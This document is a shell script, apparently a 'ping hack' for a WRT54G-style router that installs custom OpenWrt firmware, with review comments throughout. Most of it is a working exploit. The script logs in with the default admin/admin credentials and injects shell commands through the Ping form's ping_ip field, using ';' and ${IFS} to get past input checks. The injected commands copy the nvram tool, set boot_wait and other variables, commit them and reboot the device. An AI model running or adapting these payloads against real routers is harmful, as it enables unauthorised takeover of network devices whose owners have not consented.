Take over quinton
#! /bin/sh
##############
## takeover ;-)
##############
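# Give the router at 192.168.1.1 a static WAN configuration through its web UI.
#
# The form posted to apply.cgi sets WAN 10.0.0.1/255.0.0.0, gateway 10.0.0.254,
# DNS 10.0.0.2, and keeps the LAN side on 192.168.1.1/255.255.255.0.
# Success is detected by looking for "settings are successful" in the reply.
#
# Outputs: progress text on stdout.
# Exits:   1 (whole script) when the confirmation text is not found.
#
# NOTE(review): admin/admin look like the factory-default credentials; they are
# passed on the wget command line and over plain HTTP, so they are visible in
# the process list and on the wire. Only meaningful on an isolated bench link.
set_wan_ip() {
  # printf instead of `echo -n` / `echo -e`: neither flag is portable under
  # #!/bin/sh (some shells print the flag literally).
  printf 'setting WAN IP...'
  if ! wget -q -O - --http-user=admin --http-passwd=admin \
    --post-data='submit_button=index&change_action=&submit_type=&action=Apply&now_proto=static&daylight_time=1&lan_ipaddr=4&wan_proto=static&wan_ipaddr=4&wan_ipaddr_0=10&wan_ipaddr_1=0&wan_ipaddr_2=0&wan_ipaddr_3=1&wan_netmask=4&wan_netmask_0=255&wan_netmask_1=0&wan_netmask_2=0&wan_netmask_3=0&wan_gateway=4&wan_gateway_0=10&wan_gateway_1=0&wan_gateway_2=0&wan_gateway_3=254&wan_dns=3&wan_dns0_0=10&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=2&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=1&wan_mtu=1492&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&lan_proto=static&dhcp_check=&time_zone=%2B01+2+2&_daylight_time=1' \
    http://192.168.1.1/apply.cgi 2> /dev/null |
    grep -qi "settings are successful"; then
    printf '\nsetting WAN-IP error !\n'
    exit 1
  fi
  echo "OK"
}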
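# Submit one value as the "ping_ip" field of the router's Ping diagnostic form.
#
# Arguments: $1 - raw value for ping_ip; it is URL-encoded with the helper
#                 ./url-encode.php (must be executable in the current directory).
# Outputs:   two progress dots on stdout.
# Exits:     1 (whole script) when the encoder or the HTTP request fails.
#
# NOTE(review): every caller passes a value starting with ';', so the stock
# firmware presumably hands ping_ip to a shell without validation. Firmware
# that validates this field will not react to these requests.
ping_hack() {
  # Quote "$1": unquoted, the payloads' '*' characters are subject to pathname
  # expansion (and word splitting) in the LOCAL shell before being encoded.
  data=$(./url-encode.php "$1") || {
    printf '\n error in command !\n'
    exit 1
  }
  printf '.'
  POST_DATA='submit_button=Ping&submit_type=start&action=Apply&change_action=gozila_cgi&ping_ip='"$data"'&ping_times=5'
  if ! wget -q -O /dev/null --http-user=admin --http-passwd=admin \
    --post-data="$POST_DATA" http://192.168.1.1/apply.cgi; then
    printf '\n error in command !\n'
    exit 1
  fi
  printf '.'
}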
# Preparation step: two requests through ping_hack.
#   1. ';true'  - a no-op value, presumably a probe that the request path works.
#   2. a cp command that copies a file named "nvram" (located by glob) to /tmp/n.
# The single quotes keep ${IFS} and the globs literal on the local side; the
# later payloads in this script invoke the copy as '*/n'.
pre_hack() {
  ping_hack ';true' &&
    ping_hack ';cp${IFS}*/*/nvram${IFS}/tmp/n'
}
# Ask the router to run /sbin/reboot via ping_hack, then report completion.
# NOTE(review): this function shadows any local `reboot` command for the rest
# of the script; nothing in the visible script calls it.
reboot() {
  ping_hack ';/sbin/reboot'
  printf '%s\n' "done"
}
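# Main sequence.
# $1 is stored in nvram as rc-ap; it is interpolated into the request below
# (double-quoted payload), so it should be a plain identifier.
ap=$1

set_wan_ip
pre_hack

# printf instead of `echo -n`, which is not portable under #!/bin/sh.
printf 'activation bootwait, reconfigure and reboot'

# Each value is sent as one ping_ip field: set boot_wait and the rc-* nvram
# variables with the copied nvram tool (*/n), commit them, then reboot.
for PING_IP in \
  ';*/n${IFS}set${IFS}boot_wait=on' \
  ';*/n${IFS}set${IFS}rc-reconfigure=on' \
  ";*/n\${IFS}set\${IFS}rc-ap=$ap" \
  ';*/n${IFS}commit' \
  ';/sbin/reboot'
do
  # Fix: the loop variable is PING_IP; the original passed the unset $DATA,
  # so every iteration sent an empty ping_ip and nothing was configured.
  ping_hack "$PING_IP"
done
echo "OK"
echo "firmware hacked OK ... you can safely flash your firmware ; your ap is rebooting again ..."
exit 0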
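# Upload openwrt-g-code.bin to the router over TFTP (binary mode, 1 s
# retransmit). Unreachable as written: the script exits with `exit 0` before
# this point, leaving the flash step to be done by hand.
#
# Fix: the redirection belongs on the command line, not after the here-document
# terminator. "EOF > /dev/null 2>&1" is not recognised as the terminator, so
# the here-document swallowed the rest of the file.
#
# NOTE(review): many tftp clients exit 0 even when the transfer fails, so this
# status check may not catch a failed upload - confirm with the client in use.
# NOTE(review): the image is sent without any integrity check; compare its
# checksum with the value published by the firmware project before flashing.
if ! tftp 192.168.1.1 <<EOF > /dev/null 2>&1
binary
rexmt 1
put openwrt-g-code.bin
quit
EOF
then
  # Message (German): "Error while uploading the custom firmware!"
  printf '\nFehler beim Upload der eigenen Firmware!\n'
  exit 1
fi
echo "OK"
# Message (German): "Update completed successfully, the custom firmware was installed."
echo "Update erfolgreich abgeschlossen, die eigene Firmware wurde aufgespielt. :-)"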